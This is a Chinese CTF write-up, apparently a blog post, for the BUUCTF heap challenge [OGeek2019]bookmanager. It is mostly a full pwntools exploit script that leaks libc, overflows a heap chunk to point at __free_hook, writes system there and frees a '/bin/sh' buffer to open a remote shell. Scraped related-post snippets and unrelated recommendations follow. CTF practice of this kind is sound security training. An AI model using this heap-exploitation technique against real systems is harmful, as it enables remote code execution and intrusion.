做过的代码量最大的一个题

说出的好也好,不好也不好,利用点很简单,就是一个大规模的heapoverflow,就是逆起来有点儿难度

思路很简单,就是利用堆溢出覆盖结构体中的指针为__free_hook,然后改freehook

给整吐了,做了俩小时,然后本地到了最后一步,freehook每次内容都是一个奇怪的值,就是改不了system,然后远程一打就通了-.-||

 1 from pwn import *

 2

 3 local = 0

 4

 5 binary = "./pwn"

 6

 7 if local == 1:

 8     p = process(binary)

 9 else:

10     p = remote("node3.buuoj.cn",27329)

11

12 def dbg():

13     context.log_level = 'debug'

14

15 context.terminal = ['tmux','splitw','-h']

16

17 def create_book(name):

18     p.sendafter('Name of the book you want to create:',name)

19

20 def add_chapter(name):

21     p.sendlineafter('Your choice:','1')

22     p.sendafter('Chapter name:',name)

23

24 def add_section(chapter_name,name):

25     p.sendlineafter('Your choice:','2')

26     p.sendafter('Which chapter do you want to add into:',chapter_name)

27     p.sendafter('Section name:',name)

28

29 def add_text(section_name,size,name):

30     p.sendlineafter('Your choice:','3')

31     p.sendafter('Which section do you want to add into:',section_name)

32     p.sendafter('How many chapters you want to write:',str(size))

33     p.sendafter('Text:',name)

34

35 def remove_chapter(chapter_name):

36     p.sendlineafter('Your choice:','4')

37     p.sendafter('Chapter name:',chapter_name)

38

39 def remove_section(section_name):

40     p.sendlineafter('Your choice:','5')

41     p.sendafter('Section name:',section_name)

42

43 def remove_text(section_name):

44     p.sendlineafter('Your choice:','6')

45     p.sendafter('Section name:',section_name)

46

47 def show():

48     p.sendlineafter('Your choice:','7')

49

50 def edit_text(sectionname,newname):

51     p.sendlineafter('Your choice:','8')

52     p.sendlineafter('What to update?(Chapter/Section/Text):','Text')

53     p.sendafter('Section name:',sectionname)

54     p.sendafter('New Text:',newname)

55

56 def edit_section(old_sectionname,newname):

57     p.sendlineafter('Your choice:','8')

58     p.sendlineafter('What to update?(Chapter/Section/Text):','Section')

59     p.sendafter('Section name:',old_sectionname)

60     p.sendafter('New Section name:',newname)

61

62 libc = ELF('./libc-2.23.so')

63

64 create_book('lemon')

65

66 print "==== step1: leak libc ===="

67 add_chapter('one')

68 add_section('one','c' * 8)

69 add_text('c' * 8,0x80,'d' * 8)

70

71 add_chapter('\x01')

72

73 remove_text('cccccccc')

74 add_text('cccccccc',0x80,'aaaaaaaa')

75 show()

76 __malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 88 - 0x10

77 libc_base = __malloc_hook - libc.sym['__malloc_hook']

78 __free_hook = libc_base + libc.sym['__free_hook']

79 system = libc_base + libc.sym['system']

80 print "libc base: ",hex(libc_base)

81

82 print "==== step2: heapoverflow make heap pointer to free hook ===="

83 add_text('cccccccc',0x10,'\x01')

84 payload = '/bin/sh\x00' + 'a' * 8 + p64(0) + p64(0x41) + 'dddddddd' + p64(0) * 3 + p64(__free_hook)

85 add_section('one','dddddddd')

86 #dbg()

87 edit_text('cccccccc',payload)

88 edit_text('dddddddd',p64(system))

89 remove_text('cccccccc')

90

91 #gdb.attach(p)

92 p.interactive()

[OGeek2019]bookmanager的更多相关文章

  1. execution(* *..BookManager.save(..))的解读

    execution(* *..BookManager.save(..))的解读: 第一颗* 代表ret-type-pattern 返回值可任意, *..BookManager 代表任意Pacakge里 ...

  2. [BUUCTF]PWN7——[OGeek2019]babyrop

    [BUUCTF]PWN7--[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启 ...

  3. buuctf@[OGeek2019]babyrop

    #!/usr/bin/python #coding:utf-8 from pwn import * #context.log_level = 'debug' io = process('./pwn', ...

  4. 张高兴的 UWP 开发笔记:横向 ListView

    ListView 默认的排列方向是纵向 ( Orientation="Vertical" ) ,但如果我们需要横向显示的 ListView 怎么办? Blend for Visua ...

  5. AIDL使用解析

    简书本文地址:点击跳转到简书查看 之前面试的时候被问到这个问题,然而当时只有一个大致的印象,随GG,于是我就重新整理的一下.这里大力推荐<Android开发艺术探索>这本书,写的太好了! ...

  6. Android 进程通信机制之 AIDL

    什么是 AIDL AIDL 全称 Android Interface Definition Language,即 安卓接口描述语言.听起来很深奥,其实它的本质就是生成进程间通信接口的辅助工具.它的存在 ...

  7. 设计模式之美:Manager(管理器)

    索引 意图 结构 参与者 适用性 效果 实现 实现方式(一):Manager 模式的示例实现. 意图 将对一个类的所有对象的管理封装到一个单独的管理器类中. 这使得管理职责的变化独立于类本身,并且管理 ...

  8. Lucene.net站内搜索—6、站内搜索第二版

    目录 Lucene.net站内搜索—1.SEO优化 Lucene.net站内搜索—2.Lucene.Net简介和分词Lucene.net站内搜索—3.最简单搜索引擎代码Lucene.net站内搜索—4 ...

  9. 轻松掌握:JavaScript享元模式

    享元模式 在JavaScript中,浏览器特别是移动端的浏览器分配的内存很有限,如何节省内存就成了一件非常有意义的事情.节省内存的一个有效方法是减少对象的数量. 享元模式(Flyweight),运行共 ...

随机推荐

  1. 网络爬虫:利用selenium,pyquery库抓取并处理京东上的图片并存储到使用mongdb数据库进行存储

    一,环境的搭建已经简单的工具介绍 1.selenium,一个用于Web应用程序测试的工具.其特点是直接运行在浏览器中,就像真正的用户在操作一样.新版本selenium2集成了 Selenium 1.0 ...

  2. dubbo学习(十一)dubbo知识点总结

    一.基础概念 Dubbo是个啥? 定义:Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC 分布式远程调用服务框架,现已成为 Apache 基金会孵化项目. 核心功能:远程服务调用. 为什么要 ...

  3. 微服务实战系列(四)-注册中心springcloud alibaba nacos

    1.场景描述 因要用到微服务,关于注册中心这块,与同事在技术原型上做了讨论,初步定的方案是使用:阿里巴巴的nacos+springcloud gateway,下面表格是同事整理的注册中心对比,以前用的 ...

  4. 关于消息中间件ActiveMQ的企业级应用

    几个月前看到项目中配置了activeMq,于是想通透的掌握activeMq,便去网上学习搜寻资料,找到这一篇博客挺不错的,解释的比较清楚,包括原理使用和配置,特此把它分享给大家. 众所周知,消息中间件 ...

  5. oracle中插入一条记录后,重新登录查找不到数据

    你插入了数据,但是没有提交.其他Session也就是你再次登录后自然就看不到了(但是在当前回话可以看到插入的数据),但是你用SQLPLUS EXIT之后再次登录就可以看到插入的数据了,因为ORACLE ...

  6. 日志分析平台ELK之前端展示kibana

    之前的博客一直在聊ELK集群中的存储.日志收集相关的组件的配置,但通常我们给用户使用不应该是一个黑黑的shell界面,通过接口去查询搜索:今天我们来了ELK中的前端可视化组件kibana:kibana ...

  7. CISCO交换机STP实验(生成树协议)

    目录 一.前言:生成树协议(STP) 二.CISCO交换机STP命令汇总 三.运用STP搭建简单拓扑 四.实战:STP综合实验 五.结语 一.前言:生成树协议(STP) 计算机网络中,我们为了减少网络 ...

  8. C++ “string”: 未声明的标识符

    转载:https://blog.csdn.net/kkkmmmjjjj/article/details/53780549 解决方案: 要添加using namespace std;语句在宏定义后面. ...

  9. matlab中imread 从图形文件读取图像

    来源:https://ww2.mathworks.cn/help/matlab/ref/imread.html?searchHighlight=imread&s_tid=doc_srchtit ...

  10. MySql 关闭 bin 和 log 日志

    mysql 的 bin 和 .log 日志文件会非常占用磁盘空间和 IO,修改 mysql 配置文件可以关闭这两种日志的记录. 关闭 bin 日志,将下面三项配置注释掉: #log_bin = mys ...